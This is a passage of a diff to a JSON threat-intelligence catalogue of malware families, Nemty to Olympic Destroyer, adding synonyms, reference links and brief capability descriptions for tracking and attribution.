"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f061ad00-c215-478e-ae31-77fcdc2f4963", + "value": "NedDnLoader" + }, + { + "description": "According to Vitali Kremez and Michael Gillespie, this ransomware shares much code with Nemty 2.5. A difference is removal of the RaaS component, which was switched to email communications for payments. Uses AES-128, which is then protected RSA2048.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nefilim", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", + "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", + "https://www.picussecurity.com/resource/blog/how-to-beat-nefilim-ransomware-attacks", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/", + "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", + "https://news.sophos.com/en-us/2021/01/26/nefilim-ransomware-attack-uses-ghost-credentials/", + "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", + "https://www.trendmicro.com/en_us/research/21/b/nefilim-ransomware.html", + "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://id-ransomware.blogspot.com/2020/03/nefilim-ransomware.html", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://www.bleepingcomputer.com/news/security/home-appliance-giant-whirlpool-hit-in-nefilim-ransomware-attack/", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/nefilim-ransomware-threatens-to-expose-stolen-data", + "https://www.cert.govt.nz/it-specialists/advisories/active-ransomware-campaign-leveraging-remote-access-technologies/", + "https://labs.sentinelone.com/meet-nemty-successor-nefilim-nephilim-ransomware/" + ], + "synonyms": [ + "Nephilim Ransomware" + ], + "type": [] + }, + "uuid": "895f088e-a862-462c-a754-6593c6a471da", + "value": "Nefilim Ransomware" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nemim", - "https://securelist.com/files/2014/11/darkhotelappendixindicators_kl.pdf" + "https://www.secureworks.com/research/threat-profiles/tungsten-bridge", + "http://blog.nsfocus.net/darkhotel-3-0908/" ], "synonyms": [ "Nemain" @@ -12188,6 +22503,67 @@ "uuid": "5ce7906e-b1fd-4860-b3e2-ac9c72033428", "value": "Nemim" }, + { + "description": "Nemty is a ransomware that was discovered in September 2019. Fortinet states that they found it being distributed through similar ways as Sodinokibi and also noted artfifacts they had seen before in Gandcrab.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nemty", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nemty-ransomware-trik-botnet", + "https://www.bleepingcomputer.com/news/security/fake-paypal-site-spreads-nemty-ransomware/", + "https://www.fortinet.com/blog/threat-research/nemty-ransomware-early-stage-threat.html", + "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.bleepingcomputer.com/news/security/nemty-ransomware-gets-distribution-from-rig-exploit-kit/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/nemty-ransomware-learning-by-doing/", + "https://www.bleepingcomputer.com/news/security/nemty-ransomware-decryptor-released-recover-files-for-free/", + "https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2019-08-24-nemty-ransomware-notes.vk.raw", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.tesorion.nl/nemty-update-decryptors-for-nemty-1-5-and-1-6/", + "https://www.bleepingcomputer.com/news/security/new-nemty-ransomware-may-spread-via-compromised-rdp-connections/", + "https://www.lastline.com/labsblog/nemty-ransomware-scaling-up-apac-mailboxes-swarmed-dual-downloaders/", + "https://github.com/albertzsigovits/malware-notes/blob/master/Nemty.md", + "https://labs.sentinelone.com/meet-nemty-successor-nefilim-nephilim-ransomware/", + "https://medium.com/csis-techblog/the-nemty-affiliate-model-13f5cf7ab66b" + ], + "synonyms": [], + "type": [] + }, + "uuid": "465696be-d576-4750-9469-89e19984f3df", + "value": "Nemty" + }, + { + "description": "Neshta is a 2005 Belarusian file infector virus . The name of the virus comes from the Belarusian word \"nesta\" meaning \"something.\" The program is a Windows application (exe file). Written in Delphi . The size of the original malicious file is 41,472 bytes . This file virus is the type of virus that is no longer popular at present.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.neshta", + "https://www.virusradar.com/en/Win32_Neshta.A/description", + "https://www.virusbulletin.com/virusbulletin/2014/08/bird-s-nest", + "https://threatvector.cylance.com/en_us/home/threat-spotlight-neshta-file-infector-endures.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "13d2482d-21fc-4044-891e-a7fb2b1660e9", + "value": "neshta" + }, + { + "description": "NESTEGG is a memory-only backdoor that can proxy commands to other\r\ninfected systems using a custom routing scheme. It accepts commands to\r\nupload and download files, list and delete files, list and terminate processes, and\r\nstart processes. NESTEGG also creates Windows Firewall rules that allows the\r\nbackdoor to bind to a specified port number to allow for inbound traffic.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nestegg", + "https://content.fireeye.com/apt/rpt-apt38", + "https://youtu.be/_kzFNQySEMw?t=789", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180231/LazarusUnderTheHood_PDF_final_for_securelist.pdf", + "https://youtu.be/8hJyLkLHH8Q?t=1208", + "https://www.documentcloud.org/documents/4834259-Park-Jin-Hyok-Complaint.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "fce1f9a7-bac7-4b11-8ea7-3c72931cd14a", + "value": "NESTEGG" + }, { "description": "", "meta": { @@ -12206,9 +22582,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neteagle", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/eagle-eye-is-back-apt30/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [ + "Neteagle_Scout", "ScoutEagle" ], "type": [] @@ -12216,6 +22594,32 @@ "uuid": "3bb8052e-8ed2-48e3-a2cf-7358bae8c6b5", "value": "NETEAGLE" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.netflash", + "https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "88b2b4ac-9e46-4bc6-b4f6-bf5ddd70ad31", + "value": "NetFlash" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.netkey", + "https://twitter.com/kevinperlow/status/1156406115472760835" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b8ec2602-c5e5-4b49-a50e-bb3d9676abc3", + "value": "NetKey" + }, { "description": "", "meta": { @@ -12234,11 +22638,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.netsupportmanager_rat", - "http://www.netsupportmanager.com/index.asp", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-hoeflertext-popups-targeting-google-chrome-users-now-pushing-rat-malware/", - "https://www.bleepingcomputer.com/news/security/hacked-steam-accounts-spreading-remote-access-trojan/" + "https://www.bleepingcomputer.com/news/security/hacked-steam-accounts-spreading-remote-access-trojan/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part2/", + "https://blog.sucuri.net/2020/11/css-js-steganography-in-fake-flash-player-update-malware.html", + "https://blog.prevailion.com/2020/03/the-curious-case-of-criminal-curriculum.html", + "http://www.netsupportmanager.com/index.asp" + ], + "synonyms": [ + "NetSupport" ], - "synonyms": [], "type": [] }, "uuid": "42562c47-08e1-46bc-962c-28d1831d092b", @@ -12249,8 +22658,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nettraveler", + "https://cybergeeks.tech/dissecting-apt21-samples-using-a-step-by-step-approach/", "https://www.proofpoint.com/us/threat-insight/post/nettraveler-apt-targets-russian-european-interests", - "https://cdn.securelist.com/files/2014/07/kaspersky-the-net-traveler-part1-final.pdf" + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf" ], "synonyms": [ "TravNet" @@ -12265,14 +22675,32 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire", - "http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/", + "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", "https://www.circl.lu/pub/tr-23/", - "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", - "http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html", + "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", + "https://news.drweb.ru/show/?i=13281&c=23", + "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/", + "https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728", + "https://maskop9.wordpress.com/2019/01/30/analysis-of-netwiredrc-trojan/", + "https://www.amnesty.org/en/latest/research/2020/06/india-human-rights-defenders-targeted-by-a-coordinated-spyware-operation/", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire", "https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data", - "https://maskop9.wordpress.com/2019/01/30/analysis-of-netwiredrc-trojan/" + "https://blog.vincss.net/2020/03/re011-unpack-crypter-cua-malware-netwire-bang-x64dbg.html", + "http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/", + "https://decoded.avast.io/adolfstreda/the-tangle-of-wiryjmpers-obfuscation/", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://news.sophos.com/en-us/2020/05/14/raticate/", + "https://context-cdn.washingtonpost.com/notes/prod/default/documents/b19a6f2e-55a1-4915-9c2d-5fae0110418c/note/b463d38b-2384-4bb0-a94b-b1b17223ffd0.", + "https://www.secureworks.com/research/threat-profiles/cobalt-trinity", + "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", + "http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html" ], "synonyms": [ + "NetWeird", + "NetWire", "Recam" ], "type": [] @@ -12285,6 +22713,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neuron", + "https://www.secureworks.com/research/threat-profiles/iron-hunter", + "https://www.ncsc.gov.uk/news/turla-group-exploits-iran-apt-to-expand-coverage-of-victims", "https://www.ncsc.gov.uk/alerts/turla-group-malware" ], "synonyms": [], @@ -12298,16 +22728,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino", + "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/22", "https://securityblog.switch.ch/2017/07/07/94-ch-li-domain-names-hijacked-and-used-for-drive-by/", "http://www.peppermalware.com/2019/01/analysis-of-neutrino-bot-sample-2018-08-27.html", + "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/", "https://blog.malwarebytes.com/threat-analysis/2015/08/inside-neutrino-botnet-builder/", "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet", - "http://securitykitten.github.io/an-evening-with-n3utrino/", "https://blog.malwarebytes.com/threat-analysis/2017/02/new-neutrino-bot-comes-in-a-protective-loader/", "https://blog.malwarebytes.com/cybercrime/2017/01/post-holiday-spam-campaign-delivers-neutrino-bot/", "http://blog.trendmicro.com/trendlabs-security-intelligence/credit-card-scraping-kasidet-builder-leads-to-spike-in-detections/", + "https://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex", "http://malware.dontneedcoffee.com/2014/06/neutrino-bot-aka-kasidet.html", - "https://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex" + "http://blog.ptsecurity.com/2019/08/finding-neutrino.html" ], "synonyms": [ "Kasidet" @@ -12322,12 +22754,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino_pos", - "https://securelist.com/neutrino-modification-for-pos-terminals/78839/", - "https://securelist.com/jimmy-nukebot-from-neutrino-with-love/81667/" - ], - "synonyms": [ - "Jimmy" + "https://securelist.com/neutrino-modification-for-pos-terminals/78839/" ], + "synonyms": [], "type": [] }, "uuid": "a954e642-4cf4-4293-a4b0-c82cf2db785d", @@ -12338,7 +22767,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.newcore_rat", - "https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations" + "https://meltx0r.github.io/tech/2020/02/12/goblin-panda-apt.html", + "https://securelist.com/cycldek-bridging-the-air-gap/97157/", + "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", + "https://blog.viettelcybersecurity.com/p1-chien-dich-cua-nhom-apt-trung-quoc-goblin-panda-tan-cong-vao-viet-nam-loi-dung-dai-dich-covid-19/", + "https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations", + "https://drive.google.com/file/d/11otA_VmL061KcFC5MhDYuNdIKHYbpyrd/view", + "https://medium.com/@Sebdraven/goblin-panda-continues-to-target-vietnam-bc2f0f56dcd6" ], "synonyms": [], "type": [] @@ -12346,15 +22781,27 @@ "uuid": "f18b17a7-9124-42e8-a2f2-4a1a9839aee8", "value": "NewCore RAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.newpass", + "https://www.telsy.com/turla-venomous-bear-updates-its-arsenal-newpass-appears-on-the-apt-threat-scene/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c1dbbd04-050c-47ce-8164-791f17a4a6b4", + "value": "NewPass" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.newposthings", "https://blog.trendmicro.com/trendlabs-security-intelligence/newposthings-has-new-pos-things/", - "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html", - "https://asert.arbornetworks.com/lets-talk-about-newposthings/", - "http://www.cyintanalysis.com/a-quick-look-at-a-likely-newposthings-sample/" + "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/", + "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html" ], "synonyms": [], "type": [] @@ -12380,7 +22827,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.new_ct", - "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf" + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-express" ], "synonyms": [ "CT" @@ -12422,13 +22870,29 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ngioweb", + "https://www.fireeye.com/blog/threat-research/2018/05/deep-dive-into-rig-exploit-kit-delivering-grobios-trojan.html", "https://research.checkpoint.com/ramnits-network-proxy-servers/" ], + "synonyms": [ + "Grobios" + ], + "type": [] + }, + "uuid": "35fd764f-8723-4663-9bbf-5b02a64ec02e", + "value": "Ngioweb (Windows)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nibiru", + "https://blog.talosintelligence.com/2020/11/Nibiru-ransomware.html" + ], "synonyms": [], "type": [] }, - "uuid": "35fd764f-8723-4663-9bbf-5b02a64ec02e", - "value": "Ngioweb" + "uuid": "5a998606-a9a9-42ad-affb-9be37e11ec25", + "value": "Nibiru" }, { "description": "", @@ -12448,7 +22912,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol/" + "https://blogs.technet.microsoft.com/microsoft_blog/2012/09/13/microsoft-disrupts-the-emerging-nitol-botnet-being-spread-through-an-unsecure-supply-chain/", + "https://en.wikipedia.org/wiki/Nitol_botnet", + "https://krebsonsecurity.com/tag/nitol/" ], "synonyms": [], "type": [] @@ -12456,17 +22922,55 @@ "uuid": "e1fb348b-5e2b-4a26-95af-431065498ff5", "value": "Nitol" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nixscare", + "https://twitter.com/3xp0rtblog/status/1302584919592501248" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a49d1134-f4d9-4778-bbd4-c70655be9cf6", + "value": "NixScare Stealer" + }, { "description": "RedPacket Security describes NJRat as \"a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives.\"\r\n\r\nIt is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat", - "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf", - "http://csecybsec.com/download/zlab/20171221_CSE_Bladabindi_Report.pdf", - "http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/", - "https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services", + "https://asec.ahnlab.com/1369", + "https://github.com/itsKindred/malware-analysis-writeups/blob/master/bashar-bachir-chain/bashar-bachir-analysis.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", - "http://blogs.360.cn/post/analysis-of-apt-c-37.html" + "https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks", + "http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/", + "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/", + "https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/", + "https://www.4hou.com/posts/VoPM", + "https://blog.sonatype.com/bladabindi-njrat-rat-in-jdb.js-npm-malware", + "https://blogs.360.cn/post/APT-C-44.html", + "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/", + "https://www.secureworks.com/research/threat-profiles/copper-fieldstone", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf", + "https://unit42.paloaltonetworks.com/njrat-pastebin-command-and-control", + "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf", + "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", + "https://malwr-analysis.com/2020/06/21/njrat-malware-analysis/", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://news.sophos.com/en-us/2020/05/14/raticate/", + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "http://blogs.360.cn/post/analysis-of-apt-c-37.html", + "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g", + "https://www.trendmicro.com/en_us/research/20/i/wind-up-windscribe-vpn-bundled-with-backdoor.html", + "https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services", + "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.njRAT", + "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", + "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", + "https://ti.360.net/blog/articles/analysis-of-apt-c-27/", + "https://blog.reversinglabs.com/blog/rats-in-the-library" ], "synonyms": [ "Bladabindi" @@ -12495,7 +22999,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nokki", "https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/", - "https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/" + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf" ], "synonyms": [], "type": [] @@ -12530,17 +23036,51 @@ "uuid": "b9c767c7-a1e8-476a-8032-9686d51df7de", "value": "nRansom" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.numando", + "https://www.welivesecurity.com/2020/10/01/latam-financial-cybercrime-competitors-crime-sharing-ttps/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "69d63487-6200-4f71-845e-df3997402b00", + "value": "Numando" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nvisospit", + "http://www.isg.rhul.ac.uk/dl/weekendconference2014/slides/Erik_VanBuggenhout.pdf", + "https://twitter.com/Bank_Security/status/1134850646413385728", + "https://twitter.com/r3c0nst/status/1135606944427905025" + ], + "synonyms": [], + "type": [] + }, + "uuid": "83cfa206-b485-47fd-b298-1b008ab86507", + "value": "NVISOSPIT" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim", "https://www.cert.pl/en/news/single/nymaim-revisited/", + "https://www.shadowserver.org/news/goznym-indictments-action-following-on-from-successful-avalanche-operations/", + "https://www.justice.gov/opa/pr/goznym-cyber-criminal-network-operating-out-europe-targeting-american-entities-dismantled", "https://www.proofpoint.com/us/threat-insight/post/nymaim-config-decoded", + "https://securityintelligence.com/posts/goznym-closure-comes-in-the-shape-of-a-europol-and-doj-arrest-operation/", "https://bitbucket.org/daniel_plohmann/idapatchwork", "https://arielkoren.com/blog/2016/11/02/nymaim-deep-technical-dive-adventures-in-evasive-malware/", + "https://www.proofpoint.com/us/what-old-new-again-nymaim-moves-past-its-ransomware-roots-0", "https://public.gdatasoftware.com/Web/Landingpages/DE/GI-Spring2014/slides/004_plohmann.pdf", - "https://github.com/coldshell/Malware-Scripts/tree/master/Nymaim" + "https://github.com/coldshell/Malware-Scripts/tree/master/Nymaim", + "https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/", + "https://www.lawfareblog.com/what-point-these-nation-state-indictments" ], "synonyms": [ "nymain" @@ -12563,6 +23103,38 @@ "uuid": "c8e8392f-883e-412e-9b0b-02137d0875da", "value": "Nymaim2" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.oblique_rat", + "https://blog.talosintelligence.com/2020/02/obliquerat-hits-victims-via-maldocs.html", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://securelist.com/transparent-tribe-part-2/98233/", + "https://www.secrss.com/articles/24995", + "https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "33c138a0-85d3-4497-90e9-ada1d501a100", + "value": "Oblique RAT" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.obscene", + "https://habr.com/ru/post/27053/", + "https://sysopfb.github.io/malware/2020/02/28/Golang-Wrapper-on-an-old-malware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8f623a37-80a4-4240-9586-6ea7a2a97e30", + "value": "Obscene" + }, { "description": "", "meta": { @@ -12581,13 +23153,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.octopus", - "https://securelist.com/octopus-infested-seas-of-central-asia/88200/" + "https://securelist.com/octopus-infested-seas-of-central-asia/88200/", + "https://mp.weixin.qq.com/s/v1gi0bW79Ta644Dqer4qkw", + "https://isc.sans.edu/diary/26918" ], "synonyms": [], "type": [] }, "uuid": "777b76f9-5390-4899-b201-ebaa8a329c96", - "value": "Octopus" + "value": "Octopus (Windows)" }, { "description": "", @@ -12606,7 +23180,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.odinaff", - "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks" + "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", + "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks" ], "synonyms": [], "type": [] @@ -12614,6 +23189,22 @@ "uuid": "045df65f-77fe-4880-af34-62ca33936c6e", "value": "Odinaff" }, + { + "description": "a new, previously unknown backdoor that we named Okrum. The malicious actors behind the Okrum malware were focused on the same targets in Slovakia that were previously targeted by Ketrican 2015 backdoors.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.okrum", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", + "https://www.welivesecurity.com/2019/07/18/okrum-ke3chang-targets-diplomatic-missions/", + "https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "af2e4e0d-e8ae-48a9-aac4-2a49242c68d2", + "value": "Okrum" + }, { "description": "According to FireEye, OLDBAIT is a credential stealer that has been observed to be used by APT28.\r\nIt targets Internet Explorer, Mozilla Firefox, Eudora, The Bat! (an email client by a Moldovan company), and Becky! (an email client made by a Japanese company). It can use both HTTP or SMTP to exfiltrate data.\r\nIn some places it is mistakenly named \"Sasfis\", which however seems to be a completely different and unrelated malware family.", "meta": { @@ -12635,41 +23226,42 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.olympic_destroyer", + "https://www.youtube.com/watch?v=a4BZ3SZN-CI", "http://blog.talosintelligence.com/2018/02/olympic-destroyer.html", + "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too", + "https://www.wired.com/story/us-indicts-sandworm-hackers-russia-cyberwar-unit/", "https://www.lastline.com/labsblog/olympic-destroyer-south-korea/", + "https://www.youtube.com/watch?v=1jgdMY12mI8", "https://securelist.com/the-devils-in-the-rich-header/84348/", + "https://www.youtube.com/watch?v=wCv9SiSA7Sw", + "https://www.lastline.com/labsblog/attribution-from-russia-with-code/", + "https://securelist.com/apt-trends-report-q2-2020/97937/", "https://cyber.wtf/2018/03/28/dissecting-olympic-destroyer-a-walk-through/", + "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", "https://www.virusbulletin.com/virusbulletin/2018/10/vb2018-paper-who-wasnt-responsible-olympic-destroyer/", "https://securelist.com/olympic-destroyer-is-still-alive/86169/", + "https://www.endgame.com/blog/technical-blog/stopping-olympic-destroyer-new-process-injection-insights", "http://blog.talosintelligence.com/2018/02/who-wasnt-responsible-for-olympic.html", - "https://www.lastline.com/labsblog/attribution-from-russia-with-code/", + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://www.wired.com/story/untold-story-2018-olympics-destroyer-cyberattack/", + "https://www.mbsd.jp/blog/20180215.html", "https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/" ], - "synonyms": [], + "synonyms": [ + "SOURGRAPE" + ], "type": [] }, "uuid": "f3ba8a50-0105-4aa9-90b2-01df15f50b28", "value": "Olympic Destroyer" }, - { - "description": "", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.onekeylocker", - "https://twitter.com/malwrhunterteam/status/1001461507513880576" - ], - "synonyms": [], - "type": [] - }, - "uuid": "838e2a3a-c4cb-4bee-b07f-c97b143c68d6", - "value": "OneKeyLocker" - }, { "description": "", "meta": { "refs": [ 